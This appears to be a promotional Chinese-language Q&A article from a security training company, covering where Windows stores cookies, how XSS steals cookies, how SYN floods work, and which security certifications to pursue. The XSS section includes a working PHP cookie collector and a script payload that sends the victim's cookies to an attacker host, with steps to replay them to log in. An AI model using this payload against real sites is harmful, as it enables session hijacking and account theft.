1.cookie 存在哪里？可以打开吗？

　　C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies

　　工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到 cookies 文件夹。

　　2.xss 如何盗取 cookie？

　　攻击者代码：

<?php

$cookie=$_GET['cookie'];

$time=date('Y-m-d g:i:s');

$referer=getenv('HTTP_REFERER');

$cookietxt=fopen('cookie.txt','a');

fwrite($cookietxt,"time:".$time." cookie:".$cookie."

referer:".$referer.""); 注意双引号，容易出错

fclose($cookietxt);

?> 

　　脚本端：

<script>

document.write('<img

src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0

border=0 />');

</script> 

　　获取到 cookie 后，用 firebug 找到 cookie，新建 cookie

　　加入 cookie，用 referer 来提交，无需输入帐号密码直接登录进去！

　　3、SYN 攻击原理

　　SYN 攻击属于 DOS 攻击的一种，它利用 TCP 协议缺陷，通过发送大量的半连接请求，耗费 CPU 和内存资源。

　　SYN 攻击除了能影响主机外，还可以危害路由器、防火墙等网络系统，事实上SYN 攻击并不管目标是什么系统，只要这些系统打开 TCP 服务就可以实施。从上图可看到，服务器接收到连接请求(syn=j)，将此信息加入未连接队列，并发送请求包给客户(syn=k,ack=j+1)，此时进入SYN_RECV 状态。

　　当服务器未收到客户端的确认包时，重发请求包，一直到超时，才将此条目从未连接队列删除。

　　配合 IP 欺骗，SYN 攻击能达到很好的效果，通常，客户端在短时间内伪造大量不存在的 IP 地址，向服务器不断地发送 syn 包，服务器回复确认包，并等待客户的确认，由于源地址是不存在的，服务器需要不断的重发直至超时，这些伪造的 SYN 包将长时间占用未连接队列，正常的 SYN 请求被丢弃，目标系统运行缓慢，严重者引起网络堵塞甚至系统瘫痪。

　　4.证书要考哪些？

　　信息安全国际第一认证——CISSP

　　信息安全国内认证——CISAW

　　信息安全国内认证——CISP

　　信息安全技术实操认证新贵——Security+

　　IT 审计人员的必备之证——CISA

　　更多关于网络安全培训的问题，欢迎咨询千锋教育在线名师。千锋教育拥有多年IT培训服务经验，采用全程面授高品质、高体验培养模式，拥有国内一体化教学管理及学员服务，助力更多学员实现高薪梦想。